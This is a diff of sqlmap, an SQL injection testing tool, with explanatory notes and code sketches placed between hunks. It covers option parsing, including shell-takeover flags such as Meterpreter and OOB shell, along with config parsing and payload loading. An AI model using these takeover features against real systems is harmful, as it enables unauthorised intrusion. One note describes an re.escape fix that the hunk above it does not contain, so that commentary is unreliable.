                     self._feedInfo("dbmsVersion", self._version)
                     self._feedInfo("dbmsServicePack", self._servicePack)
@@ -104,8 +103,6 @@ def bannerParser(banner):
     if not xmlfile:
         return

-    checkFile(xmlfile)
-
     if Backend.isDbms(DBMS.MSSQL):
         handler = MSSQLBannerHandler(banner, kb.bannerFp)
         parseXmlFile(xmlfile, handler)
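The one-line fix above wraps the interpolated version string in re.escape() so that dots match literally instead of acting as wildcards. A small illustration of why that matters, with a made-up banner string:

    # Sketch: without re.escape(), '.' in the version string matches any character.
    import re

    banner = "Microsoft SQL Server 2005 - 9.00.1399.06"
    version = "9.00"

    loose = re.search(r" %s[\.\ ]+" % version, banner)             # '.' is a wildcard here
    strict = re.search(r" %s[\.\ ]+" % re.escape(version), banner)  # '.' is a literal dot
    print(bool(loose), bool(strict))  # both match this banner, but only the strict form is exact

    print(bool(re.search("%s" % "9.00", "9x00")))             # True - false positive
    print(bool(re.search("%s" % re.escape("9.00"), "9x00")))  # False
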
@ -1,10 +1,13 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
import os
|
||||||
|
import re
|
||||||
|
import shlex
|
||||||
import sys
|
import sys
|
||||||
|
|
||||||
from optparse import OptionError
|
from optparse import OptionError
|
||||||
|
@ -13,23 +16,37 @@ from optparse import OptionParser
|
||||||
from optparse import SUPPRESS_HELP
|
from optparse import SUPPRESS_HELP
|
||||||
|
|
||||||
from lib.core.common import checkDeprecatedOptions
|
from lib.core.common import checkDeprecatedOptions
|
||||||
|
from lib.core.common import checkSystemEncoding
|
||||||
from lib.core.common import expandMnemonics
|
from lib.core.common import expandMnemonics
|
||||||
from lib.core.common import getUnicode
|
from lib.core.common import getUnicode
|
||||||
|
from lib.core.data import cmdLineOptions
|
||||||
|
from lib.core.data import conf
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
from lib.core.defaults import defaults
|
from lib.core.defaults import defaults
|
||||||
|
from lib.core.enums import AUTOCOMPLETE_TYPE
|
||||||
|
from lib.core.exception import SqlmapShellQuitException
|
||||||
|
from lib.core.exception import SqlmapSyntaxException
|
||||||
from lib.core.settings import BASIC_HELP_ITEMS
|
from lib.core.settings import BASIC_HELP_ITEMS
|
||||||
from lib.core.settings import DUMMY_URL
|
from lib.core.settings import DUMMY_URL
|
||||||
from lib.core.settings import IS_WIN
|
from lib.core.settings import IS_WIN
|
||||||
from lib.core.settings import MAX_HELP_OPTION_LENGTH
|
from lib.core.settings import MAX_HELP_OPTION_LENGTH
|
||||||
from lib.core.settings import VERSION_STRING
|
from lib.core.settings import VERSION_STRING
|
||||||
|
from lib.core.shell import autoCompletion
|
||||||
|
from lib.core.shell import clearHistory
|
||||||
|
from lib.core.shell import loadHistory
|
||||||
|
from lib.core.shell import saveHistory
|
||||||
|
|
||||||
def cmdLineParser():
|
def cmdLineParser():
|
||||||
"""
|
"""
|
||||||
This function parses the command line parameters and arguments
|
This function parses the command line parameters and arguments
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
checkSystemEncoding()
|
||||||
|
|
||||||
|
_ = getUnicode(os.path.basename(sys.argv[0]), encoding=sys.getfilesystemencoding())
|
||||||
|
|
||||||
usage = "%s%s [options]" % ("python " if not IS_WIN else "", \
|
usage = "%s%s [options]" % ("python " if not IS_WIN else "", \
|
||||||
"\"%s\"" % sys.argv[0] if " " in sys.argv[0] else sys.argv[0])
|
"\"%s\"" % _ if " " in _ else _)
|
||||||
|
|
||||||
parser = OptionParser(usage=usage)
|
parser = OptionParser(usage=usage)
|
||||||
|
|
||||||
|
@ -47,18 +64,20 @@ def cmdLineParser():
|
||||||
|
|
||||||
# Target options
|
# Target options
|
||||||
target = OptionGroup(parser, "Target", "At least one of these "
|
target = OptionGroup(parser, "Target", "At least one of these "
|
||||||
"options has to be provided to set the target(s)")
|
"options has to be provided to define the target(s)")
|
||||||
|
|
||||||
target.add_option("-d", dest="direct", help="Direct "
|
target.add_option("-d", dest="direct", help="Connection string "
|
||||||
"connection to the database")
|
"for direct database connection")
|
||||||
|
|
||||||
target.add_option("-u", "--url", dest="url", help="Target URL (e.g. \"www.target.com/vuln.php?id=1\")")
|
target.add_option("-u", "--url", dest="url", help="Target URL (e.g. \"http://www.site.com/vuln.php?id=1\")")
|
||||||
|
|
||||||
target.add_option("-l", dest="logFile", help="Parse targets from Burp "
|
target.add_option("-l", dest="logFile", help="Parse target(s) from Burp "
|
||||||
"or WebScarab proxy logs")
|
"or WebScarab proxy log file")
|
||||||
|
|
||||||
target.add_option("-m", dest="bulkFile", help="Scan multiple targets enlisted "
|
target.add_option("-x", dest="sitemapUrl", help="Parse target(s) from remote sitemap(.xml) file")
|
||||||
"in a given textual file ")
|
|
||||||
|
target.add_option("-m", dest="bulkFile", help="Scan multiple targets given "
|
||||||
|
"in a textual file ")
|
||||||
|
|
||||||
target.add_option("-r", dest="requestFile",
|
target.add_option("-r", dest="requestFile",
|
||||||
help="Load HTTP request from a file")
|
help="Load HTTP request from a file")
|
||||||
|
@ -73,14 +92,20 @@ def cmdLineParser():
|
||||||
request = OptionGroup(parser, "Request", "These options can be used "
|
request = OptionGroup(parser, "Request", "These options can be used "
|
||||||
"to specify how to connect to the target URL")
|
"to specify how to connect to the target URL")
|
||||||
|
|
||||||
|
request.add_option("--method", dest="method",
|
||||||
|
help="Force usage of given HTTP method (e.g. PUT)")
|
||||||
|
|
||||||
request.add_option("--data", dest="data",
|
request.add_option("--data", dest="data",
|
||||||
help="Data string to be sent through POST")
|
help="Data string to be sent through POST")
|
||||||
|
|
||||||
request.add_option("--param-del", dest="pDel",
|
request.add_option("--param-del", dest="paramDel",
|
||||||
help="Character used for splitting parameter values")
|
help="Character used for splitting parameter values")
|
||||||
|
|
||||||
request.add_option("--cookie", dest="cookie",
|
request.add_option("--cookie", dest="cookie",
|
||||||
help="HTTP Cookie header")
|
help="HTTP Cookie header value")
|
||||||
|
|
||||||
|
request.add_option("--cookie-del", dest="cookieDel",
|
||||||
|
help="Character used for splitting cookie values")
|
||||||
|
|
||||||
request.add_option("--load-cookies", dest="loadCookies",
|
request.add_option("--load-cookies", dest="loadCookies",
|
||||||
help="File containing cookies in Netscape/wget format")
|
help="File containing cookies in Netscape/wget format")
|
||||||
|
@ -90,42 +115,47 @@ def cmdLineParser():
|
||||||
help="Ignore Set-Cookie header from response")
|
help="Ignore Set-Cookie header from response")
|
||||||
|
|
||||||
request.add_option("--user-agent", dest="agent",
|
request.add_option("--user-agent", dest="agent",
|
||||||
help="HTTP User-Agent header")
|
help="HTTP User-Agent header value")
|
||||||
|
|
||||||
request.add_option("--random-agent", dest="randomAgent",
|
request.add_option("--random-agent", dest="randomAgent",
|
||||||
action="store_true",
|
action="store_true",
|
||||||
help="Use randomly selected HTTP User-Agent header")
|
help="Use randomly selected HTTP User-Agent header value")
|
||||||
|
|
||||||
request.add_option("--host", dest="host",
|
request.add_option("--host", dest="host",
|
||||||
help="HTTP Host header")
|
help="HTTP Host header value")
|
||||||
|
|
||||||
request.add_option("--referer", dest="referer",
|
request.add_option("--referer", dest="referer",
|
||||||
help="HTTP Referer header")
|
help="HTTP Referer header value")
|
||||||
|
|
||||||
request.add_option("--headers", dest="headers",
|
request.add_option("--headers", dest="headers",
|
||||||
help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")")
|
help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")")
|
||||||
|
|
||||||
request.add_option("--auth-type", dest="aType",
|
request.add_option("--auth-type", dest="authType",
|
||||||
help="HTTP authentication type "
|
help="HTTP authentication type "
|
||||||
"(Basic, Digest, NTLM or Cert)")
|
"(Basic, Digest, NTLM or PKI)")
|
||||||
|
|
||||||
request.add_option("--auth-cred", dest="aCred",
|
request.add_option("--auth-cred", dest="authCred",
|
||||||
help="HTTP authentication credentials "
|
help="HTTP authentication credentials "
|
||||||
"(name:password)")
|
"(name:password)")
|
||||||
|
|
||||||
request.add_option("--auth-cert", dest="aCert",
|
request.add_option("--auth-private", dest="authPrivate",
|
||||||
help="HTTP authentication certificate ("
|
help="HTTP authentication PEM private key file")
|
||||||
"key_file,cert_file)")
|
|
||||||
|
request.add_option("--ignore-401", dest="ignore401", action="store_true",
|
||||||
|
help="Ignore HTTP Error 401 (Unauthorized)")
|
||||||
|
|
||||||
request.add_option("--proxy", dest="proxy",
|
request.add_option("--proxy", dest="proxy",
|
||||||
help="Use a HTTP proxy to connect to the target URL")
|
help="Use a proxy to connect to the target URL")
|
||||||
|
|
||||||
request.add_option("--proxy-cred", dest="pCred",
|
request.add_option("--proxy-cred", dest="proxyCred",
|
||||||
help="HTTP proxy authentication credentials "
|
help="Proxy authentication credentials "
|
||||||
"(name:password)")
|
"(name:password)")
|
||||||
|
|
||||||
|
request.add_option("--proxy-file", dest="proxyFile",
|
||||||
|
help="Load proxy list from a file")
|
||||||
|
|
||||||
request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true",
|
request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true",
|
||||||
help="Ignore system default HTTP proxy")
|
help="Ignore system default proxy settings")
|
||||||
|
|
||||||
request.add_option("--tor", dest="tor",
|
request.add_option("--tor", dest="tor",
|
||||||
action="store_true",
|
action="store_true",
|
||||||
|
@ -155,23 +185,35 @@ def cmdLineParser():
|
||||||
request.add_option("--randomize", dest="rParam",
|
request.add_option("--randomize", dest="rParam",
|
||||||
help="Randomly change value for given parameter(s)")
|
help="Randomly change value for given parameter(s)")
|
||||||
|
|
||||||
request.add_option("--safe-url", dest="safUrl",
|
request.add_option("--safe-url", dest="safeUrl",
|
||||||
help="URL address to visit frequently during testing")
|
help="URL address to visit frequently during testing")
|
||||||
|
|
||||||
request.add_option("--safe-freq", dest="saFreq", type="int",
|
request.add_option("--safe-post", dest="safePost",
|
||||||
|
help="POST data to send to a safe URL")
|
||||||
|
|
||||||
|
request.add_option("--safe-req", dest="safeReqFile",
|
||||||
|
help="Load safe HTTP request from a file")
|
||||||
|
|
||||||
|
request.add_option("--safe-freq", dest="safeFreq", type="int",
|
||||||
help="Test requests between two visits to a given safe URL")
|
help="Test requests between two visits to a given safe URL")
|
||||||
|
|
||||||
request.add_option("--skip-urlencode", dest="skipUrlEncode",
|
request.add_option("--skip-urlencode", dest="skipUrlEncode",
|
||||||
action="store_true",
|
action="store_true",
|
||||||
help="Skip URL encoding of payload data")
|
help="Skip URL encoding of payload data")
|
||||||
|
|
||||||
|
request.add_option("--csrf-token", dest="csrfToken",
|
||||||
|
help="Parameter used to hold anti-CSRF token")
|
||||||
|
|
||||||
|
request.add_option("--csrf-url", dest="csrfUrl",
|
||||||
|
help="URL address to visit to extract anti-CSRF token")
|
||||||
|
|
||||||
request.add_option("--force-ssl", dest="forceSSL",
|
request.add_option("--force-ssl", dest="forceSSL",
|
||||||
action="store_true",
|
action="store_true",
|
||||||
help="Force usage of SSL/HTTPS")
|
help="Force usage of SSL/HTTPS")
|
||||||
|
|
||||||
request.add_option("--hpp", dest="hpp",
|
request.add_option("--hpp", dest="hpp",
|
||||||
action="store_true",
|
action="store_true",
|
||||||
help="Use HTTP parameter pollution")
|
help="Use HTTP parameter pollution method")
|
||||||
|
|
||||||
request.add_option("--eval", dest="evalCode",
|
request.add_option("--eval", dest="evalCode",
|
||||||
help="Evaluate provided Python code before the request (e.g. \"import hashlib;id2=hashlib.md5(id).hexdigest()\")")
|
help="Evaluate provided Python code before the request (e.g. \"import hashlib;id2=hashlib.md5(id).hexdigest()\")")
|
||||||
|
@ -210,6 +252,9 @@ def cmdLineParser():
|
||||||
injection.add_option("--skip", dest="skip",
|
injection.add_option("--skip", dest="skip",
|
||||||
help="Skip testing for given parameter(s)")
|
help="Skip testing for given parameter(s)")
|
||||||
|
|
||||||
|
injection.add_option("--skip-static", dest="skipStatic", action="store_true",
|
||||||
|
help="Skip testing parameters that not appear dynamic")
|
||||||
|
|
||||||
injection.add_option("--dbms", dest="dbms",
|
injection.add_option("--dbms", dest="dbms",
|
||||||
help="Force back-end DBMS to this value")
|
help="Force back-end DBMS to this value")
|
||||||
|
|
||||||
|
@@ -228,6 +273,10 @@ def cmdLineParser():
         action="store_true",
         help="Use logical operations for invalidating values")

+    injection.add_option("--invalid-string", dest="invalidString",
+        action="store_true",
+        help="Use random strings for invalidating values")
+
     injection.add_option("--no-cast", dest="noCast",
         action="store_true",
         help="Turn off payload casting mechanism")
@@ -254,7 +303,7 @@ def cmdLineParser():
         "default %d)" % defaults.level)

     detection.add_option("--risk", dest="risk", type="int",
-        help="Risk of tests to perform (0-3, "
+        help="Risk of tests to perform (1-3, "
         "default %d)" % defaults.level)

     detection.add_option("--string", dest="string",
@@ -386,14 +435,20 @@ def cmdLineParser():
     enumeration.add_option("--search", dest="search", action="store_true",
         help="Search column(s), table(s) and/or database name(s)")

+    enumeration.add_option("--comments", dest="getComments", action="store_true",
+        help="Retrieve DBMS comments")
+
     enumeration.add_option("-D", dest="db",
         help="DBMS database to enumerate")

     enumeration.add_option("-T", dest="tbl",
-        help="DBMS database table to enumerate")
+        help="DBMS database table(s) to enumerate")

     enumeration.add_option("-C", dest="col",
-        help="DBMS database table column to enumerate")
+        help="DBMS database table column(s) to enumerate")

+    enumeration.add_option("-X", dest="excludeCol",
+        help="DBMS database table column(s) to not enumerate")
+
     enumeration.add_option("-U", dest="user",
         help="DBMS user to enumerate")
@@ -403,6 +458,9 @@ def cmdLineParser():
         help="Exclude DBMS system databases when "
         "enumerating tables")

+    enumeration.add_option("--where", dest="dumpWhere",
+        help="Use WHERE condition while table dumping")
+
     enumeration.add_option("--start", dest="limitStart", type="int",
         help="First query output entry to retrieve")
@@ -425,7 +483,7 @@ def cmdLineParser():
     enumeration.add_option("--sql-file", dest="sqlFile",
         help="Execute SQL statements from given file(s)")

-    # User-defined function options
+    # Brute force options
     brute = OptionGroup(parser, "Brute force", "These "
         "options can be used to run brute force "
         "checks")
@@ -481,12 +539,12 @@ def cmdLineParser():
     takeover.add_option("--os-pwn", dest="osPwn",
         action="store_true",
         help="Prompt for an OOB shell, "
-        "meterpreter or VNC")
+        "Meterpreter or VNC")

     takeover.add_option("--os-smbrelay", dest="osSmb",
         action="store_true",
         help="One click prompt for an OOB shell, "
-        "meterpreter or VNC")
+        "Meterpreter or VNC")

     takeover.add_option("--os-bof", dest="osBof",
         action="store_true",
@@ -557,7 +615,10 @@ def cmdLineParser():
         help="Force character encoding used for data retrieval")

     general.add_option("--crawl", dest="crawlDepth", type="int",
         help="Crawl the website starting from the target URL")

+    general.add_option("--crawl-exclude", dest="crawlExclude",
+        help="Regexp to exclude pages from crawling (e.g. \"logout\")")
+
     general.add_option("--csv-del", dest="csvDel",
         help="Delimiting character used in CSV output "
@@ -587,7 +648,7 @@ def cmdLineParser():
         action="store_true",
         help="Use DBMS hex function(s) for data retrieval")

-    general.add_option("--output-dir", dest="oDir",
+    general.add_option("--output-dir", dest="outputDir",
         action="store",
         help="Custom output directory path")
@@ -619,7 +680,7 @@ def cmdLineParser():
         help="Use short mnemonics (e.g. \"flu,bat,ban,tec=EU\")")

     miscellaneous.add_option("--alert", dest="alert",
-        help="Run shell command(s) when SQL injection is found")
+        help="Run host OS command(s) when SQL injection is found")

     miscellaneous.add_option("--answers", dest="answers",
         help="Set question answers (e.g. \"quit=N,follow=N\")")
@@ -627,10 +688,6 @@ def cmdLineParser():
     miscellaneous.add_option("--beep", dest="beep", action="store_true",
         help="Make a beep sound when SQL injection is found")

-    miscellaneous.add_option("--check-waf", dest="checkWaf",
-        action="store_true",
-        help="Heuristically check for WAF/IPS/IDS protection")
-
     miscellaneous.add_option("--cleanup", dest="cleanup",
         action="store_true",
         help="Clean up the DBMS from sqlmap specific "
@@ -649,7 +706,7 @@ def cmdLineParser():
     miscellaneous.add_option("--identify-waf", dest="identifyWaf",
         action="store_true",
-        help="Make a through testing for a WAF/IPS/IDS protection")
+        help="Make a thorough testing for a WAF/IPS/IDS protection")

     miscellaneous.add_option("--mobile", dest="mobile",
         action="store_true",
@@ -665,7 +722,10 @@ def cmdLineParser():
     miscellaneous.add_option("--smart", dest="smart",
         action="store_true",
-        help="Conduct through tests only if positive heuristic(s)")
+        help="Conduct thorough tests only if positive heuristic(s)")

+    miscellaneous.add_option("--sqlmap-shell", dest="sqlmapShell", action="store_true",
+        help="Prompt for an interactive sqlmap shell")
+
     miscellaneous.add_option("--wizard", dest="wizard",
         action="store_true",
@@ -736,22 +796,77 @@ def cmdLineParser():
     option = parser.get_option("-h")
     option.help = option.help.capitalize().replace("this help", "basic help")

-    args = []
+    argv = []
+    prompt = False
     advancedHelp = True

     for arg in sys.argv:
-        args.append(getUnicode(arg, system=True))
+        argv.append(getUnicode(arg, encoding=sys.getfilesystemencoding()))

-    checkDeprecatedOptions(args)
+    checkDeprecatedOptions(argv)
+
+    prompt = "--sqlmap-shell" in argv
+
+    if prompt:
+        parser.usage = ""
+        cmdLineOptions.sqlmapShell = True
+
+        _ = ["x", "q", "exit", "quit", "clear"]
+
+        for option in parser.option_list:
+            _.extend(option._long_opts)
+            _.extend(option._short_opts)
+
+        for group in parser.option_groups:
+            for option in group.option_list:
+                _.extend(option._long_opts)
+                _.extend(option._short_opts)
+
+        autoCompletion(AUTOCOMPLETE_TYPE.SQLMAP, commands=_)
+
+        while True:
+            command = None
+
+            try:
+                command = raw_input("sqlmap-shell> ").strip()
+                command = getUnicode(command, encoding=sys.stdin.encoding)
+            except (KeyboardInterrupt, EOFError):
+                print
+                raise SqlmapShellQuitException
+
+            if not command:
+                continue
+            elif command.lower() == "clear":
+                clearHistory()
+                print "[i] history cleared"
+                saveHistory(AUTOCOMPLETE_TYPE.SQLMAP)
+            elif command.lower() in ("x", "q", "exit", "quit"):
+                raise SqlmapShellQuitException
+            elif command[0] != '-':
+                print "[!] invalid option(s) provided"
+                print "[i] proper example: '-u http://www.site.com/vuln.php?id=1 --banner'"
+            else:
+                saveHistory(AUTOCOMPLETE_TYPE.SQLMAP)
+                loadHistory(AUTOCOMPLETE_TYPE.SQLMAP)
+                break
+
+        try:
+            for arg in shlex.split(command):
+                argv.append(getUnicode(arg, encoding=sys.stdin.encoding))
+        except ValueError, ex:
+            raise SqlmapSyntaxException, "something went wrong during command line parsing ('%s')" % ex

     # Hide non-basic options in basic help case
-    for i in xrange(len(sys.argv)):
-        if sys.argv[i] == '-hh':
-            sys.argv[i] = '-h'
-        elif sys.argv[i] == '--version':
-            print VERSION_STRING
+    for i in xrange(len(argv)):
+        if argv[i] == "-hh":
+            argv[i] = "-h"
+        elif re.match(r"\A\d+!\Z", argv[i]) and argv[max(0, i - 1)] == "--threads" or re.match(r"\A--threads.+\d+!\Z", argv[i]):
+            argv[i] = argv[i][:-1]
+            conf.skipThreadCheck = True
+        elif argv[i] == "--version":
+            print VERSION_STRING.split('/')[-1]
             raise SystemExit
-        elif sys.argv[i] == '-h':
+        elif argv[i] == "-h":
             advancedHelp = False
             for group in parser.option_groups[:]:
                 found = False

@@ -764,24 +879,27 @@ def cmdLineParser():
                     parser.option_groups.remove(group)

     try:
-        (args, _) = parser.parse_args(args)
+        (args, _) = parser.parse_args(argv)
+    except UnicodeEncodeError, ex:
+        print "\n[!] %s" % ex.object.encode("unicode-escape")
+        raise SystemExit
     except SystemExit:
-        if '-h' in sys.argv and not advancedHelp:
+        if "-h" in argv and not advancedHelp:
             print "\n[!] to see full list of options run with '-hh'"
         raise

     # Expand given mnemonic options (e.g. -z "ign,flu,bat")
-    for i in xrange(len(sys.argv) - 1):
-        if sys.argv[i] == '-z':
-            expandMnemonics(sys.argv[i + 1], parser, args)
+    for i in xrange(len(argv) - 1):
+        if argv[i] == "-z":
+            expandMnemonics(argv[i + 1], parser, args)

     if args.dummy:
         args.url = args.url or DUMMY_URL

     if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, \
         args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, \
-        args.purgeOutput, args.pickledOptions)):
-        errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --wizard, --update, --purge-output or --dependencies), "
+        args.purgeOutput, args.pickledOptions, args.sitemapUrl)):
+        errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), "
         errMsg += "use -h for basic or -hh for advanced help"
         parser.error(errMsg)
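The new --sqlmap-shell code above reads a line interactively, tokenizes it with shlex and feeds the tokens back into the option parser. A standalone sketch of that idea, with plain optparse and without sqlmap's history/auto-completion helpers (option names here are illustrative):

# Standalone sketch of the "--sqlmap-shell" loop idea (not sqlmap's actual helpers).
import shlex
from optparse import OptionParser

parser = OptionParser()
parser.add_option("-u", dest="url", help="Target URL")
parser.add_option("--banner", dest="getBanner", action="store_true")

while True:
    try:
        command = raw_input("sqlmap-shell> ").strip()  # input() on Python 3
    except (KeyboardInterrupt, EOFError):
        break
    if command.lower() in ("x", "q", "exit", "quit"):
        break
    if not command or command[0] != "-":
        print("[!] invalid option(s) provided")
        continue
    try:
        argv = shlex.split(command)
    except ValueError as ex:
        print("[!] parsing error ('%s')" % ex)
        continue
    options, _ = parser.parse_args(argv)
    print("parsed: url=%r banner=%r" % (options.url, options.getBanner))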
@@ -1,15 +1,18 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

 import codecs

 from ConfigParser import MissingSectionHeaderError
+from ConfigParser import ParsingError

 from lib.core.common import checkFile
+from lib.core.common import getUnicode
+from lib.core.common import openFile
 from lib.core.common import unArrayizeValue
 from lib.core.common import UnicodeRawConfigParser
 from lib.core.data import conf

@@ -30,12 +33,17 @@ def configFileProxy(section, option, boolean=False, integer=False):
     global config

     if config.has_option(section, option):
-        if boolean:
-            value = config.getboolean(section, option) if config.get(section, option) else False
-        elif integer:
-            value = config.getint(section, option) if config.get(section, option) else 0
-        else:
-            value = config.get(section, option)
+        try:
+            if boolean:
+                value = config.getboolean(section, option) if config.get(section, option) else False
+            elif integer:
+                value = config.getint(section, option) if config.get(section, option) else 0
+            else:
+                value = config.get(section, option)
+        except ValueError, ex:
+            errMsg = "error occurred while processing the option "
+            errMsg += "'%s' in provided configuration file ('%s')" % (option, getUnicode(ex))
+            raise SqlmapSyntaxException(errMsg)

         if value:
             conf[option] = value

@@ -59,29 +67,31 @@ def configFileParser(configFile):
     logger.debug(debugMsg)

     checkFile(configFile)
-    configFP = codecs.open(configFile, "rb", UNICODE_ENCODING)
+    configFP = openFile(configFile, "rb")

     try:
         config = UnicodeRawConfigParser()
         config.readfp(configFP)
-    except MissingSectionHeaderError:
-        errMsg = "you have provided an invalid configuration file"
+    except Exception, ex:
+        errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % getUnicode(ex)
         raise SqlmapSyntaxException(errMsg)

     if not config.has_section("Target"):
         errMsg = "missing a mandatory section 'Target' in the configuration file"
         raise SqlmapMissingMandatoryOptionException(errMsg)

-    condition = not config.has_option("Target", "url")
+    condition = not config.has_option("Target", "direct")
+    condition &= not config.has_option("Target", "url")
     condition &= not config.has_option("Target", "logFile")
     condition &= not config.has_option("Target", "bulkFile")
     condition &= not config.has_option("Target", "googleDork")
     condition &= not config.has_option("Target", "requestFile")
+    condition &= not config.has_option("Target", "sitemapUrl")
     condition &= not config.has_option("Target", "wizard")

     if condition:
         errMsg = "missing a mandatory option in the configuration file "
-        errMsg += "(url, logFile, bulkFile, googleDork, requestFile or wizard)"
+        errMsg += "(direct, url, logFile, bulkFile, googleDork, requestFile, sitemapUrl or wizard)"
        raise SqlmapMissingMandatoryOptionException(errMsg)

     for family, optionData in optDict.items():
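The change above wraps the config read in a broad except and requires at least one target option in the [Target] section. A sketch of the same validation pattern with the plain stdlib parser (sqlmap itself uses a Unicode-aware subclass and its own exception types):

# Sketch only; the exception types and parser class are simplified stand-ins.
from ConfigParser import RawConfigParser  # 'configparser' on Python 3

def parse_config(path):
    config = RawConfigParser()
    try:
        with open(path, "rb") as fp:
            config.readfp(fp)
    except Exception as ex:
        raise ValueError("invalid and/or unreadable configuration file ('%s')" % ex)

    if not config.has_section("Target"):
        raise ValueError("missing a mandatory section 'Target' in the configuration file")

    # at least one of the target options has to be present
    if not any(config.has_option("Target", _) for _ in ("direct", "url", "logFile", "bulkFile",
                                                        "googleDork", "requestFile", "sitemapUrl", "wizard")):
        raise ValueError("missing a mandatory option in the configuration file")

    return config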
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -70,7 +70,7 @@ class FingerprintHandler(ContentHandler):
             self._feedInfo("technology", attrs.get("technology"))

             if self._sp.isdigit():
-                self._feedInfo("sp", "Service Pack %s" % self._match.group(int(self._sp)))
+                self._feedInfo("sp", "Service Pack %s" % int(self._sp))

             self._regexp = None
             self._match = None
@@ -1,14 +1,13 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

 import itertools
 import os

-from lib.core.common import checkFile
 from lib.core.common import parseXmlFile
 from lib.core.data import kb
 from lib.core.data import paths

@@ -36,7 +35,6 @@ def headersParser(headers):
     for header in itertools.ifilter(lambda x: x in kb.headerPaths, headers):
         value = headers[header]
         xmlfile = kb.headerPaths[header]
-        checkFile(xmlfile)

         handler = FingerprintHandler(value, kb.headersFp)
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -9,7 +9,6 @@ import re

 from xml.sax.handler import ContentHandler

-from lib.core.common import checkFile
 from lib.core.common import parseXmlFile
 from lib.core.data import kb
 from lib.core.data import paths

@@ -49,7 +48,6 @@ def htmlParser(page):
     """

     xmlfile = paths.ERRORS_XML
-    checkFile(xmlfile)

     handler = HTMLHandler(page)

     parseXmlFile(xmlfile, handler)
@@ -1,15 +1,19 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

+import os
+
 from xml.etree import ElementTree as et

 from lib.core.data import conf
+from lib.core.data import logger
 from lib.core.data import paths
 from lib.core.datatype import AttribDict
+from lib.core.exception import SqlmapInstallationException

 def cleanupVals(text, tag):
     if tag in ("clause", "where"):

@@ -66,7 +70,34 @@ def parseXmlNode(node):

         conf.tests.append(test)

-def loadPayloads():
-    doc = et.parse(paths.PAYLOADS_XML)
+def loadBoundaries():
+    try:
+        doc = et.parse(paths.BOUNDARIES_XML)
+    except Exception, ex:
+        errMsg = "something seems to be wrong with "
+        errMsg += "the file '%s' ('%s'). Please make " % (paths.BOUNDARIES_XML, ex)
+        errMsg += "sure that you haven't made any changes to it"
+        raise SqlmapInstallationException, errMsg
+
     root = doc.getroot()
     parseXmlNode(root)
+
+def loadPayloads():
+    payloadFiles = os.listdir(paths.SQLMAP_XML_PAYLOADS_PATH)
+    payloadFiles.sort()
+
+    for payloadFile in payloadFiles:
+        payloadFilePath = os.path.join(paths.SQLMAP_XML_PAYLOADS_PATH, payloadFile)
+
+        #logger.debug("Parsing payloads from file '%s'" % payloadFile)
+
+        try:
+            doc = et.parse(payloadFilePath)
+        except Exception, ex:
+            errMsg = "something seems to be wrong with "
+            errMsg += "the file '%s' ('%s'). Please make " % (payloadFilePath, ex)
+            errMsg += "sure that you haven't made any changes to it"
+            raise SqlmapInstallationException, errMsg
+
+        root = doc.getroot()
+        parseXmlNode(root)
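loadPayloads() now iterates over a directory of per-DBMS XML files instead of a single payloads file. A generic sketch of that pattern with ElementTree (the directory path and the node-parsing callback are placeholders, not sqlmap's real ones):

# Generic sketch of per-file payload loading; parse_node is whatever callback
# turns each XML root into in-memory test definitions.
import os
from xml.etree import ElementTree as et

def load_payload_files(directory, parse_node):
    for name in sorted(os.listdir(directory)):
        if not name.endswith(".xml"):
            continue
        path = os.path.join(directory, name)
        try:
            doc = et.parse(path)
        except Exception as ex:
            raise RuntimeError("something seems to be wrong with the file '%s' ('%s')" % (path, ex))
        parse_node(doc.getroot())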
 lib/parse/sitemap.py (new file, 57 lines)
@@ -0,0 +1,57 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import httplib
+import re
+
+from lib.core.common import readInput
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.exception import SqlmapSyntaxException
+from lib.request.connect import Connect as Request
+from thirdparty.oset.pyoset import oset
+
+abortedFlag = None
+
+def parseSitemap(url, retVal=None):
+    global abortedFlag
+
+    if retVal is not None:
+        logger.debug("parsing sitemap '%s'" % url)
+
+    try:
+        if retVal is None:
+            abortedFlag = False
+            retVal = oset()
+
+        try:
+            content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else ""
+        except httplib.InvalidURL:
